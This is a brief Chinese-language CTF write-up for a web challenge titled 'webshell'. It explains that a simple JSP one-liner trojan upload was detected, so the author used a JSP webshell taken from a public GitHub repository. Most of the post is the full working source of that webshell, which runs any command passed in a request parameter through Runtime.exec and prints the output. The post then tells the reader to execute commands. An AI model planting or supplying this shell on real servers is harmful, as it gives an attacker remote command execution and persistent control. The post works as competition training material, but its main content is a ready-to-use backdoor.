[Web] webshell - Donek1 xp0int Posted on Apr 29 2021 上传普通的jsp一句话木马会被检测,github上找一个jsp webshell绕过一下。 ``` <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if ( request.getParameter( "comment" ) != null ) { out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" ); Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) ); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream( in ); String disr = dis.readLine(); while ( disr != null ) { out.println( disr ); disr = dis.readLine(); } } %> </pre> </BODY></HTML> © 2020 GitHub, Inc. @ https://github.com/JoyChou93/webshell/blob/master/jsp/cmd.jsp ``` 然后执行命令即可 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] pwn1 - cpt.shao [Reverse] PE - Cew
没有帐号? 立即注册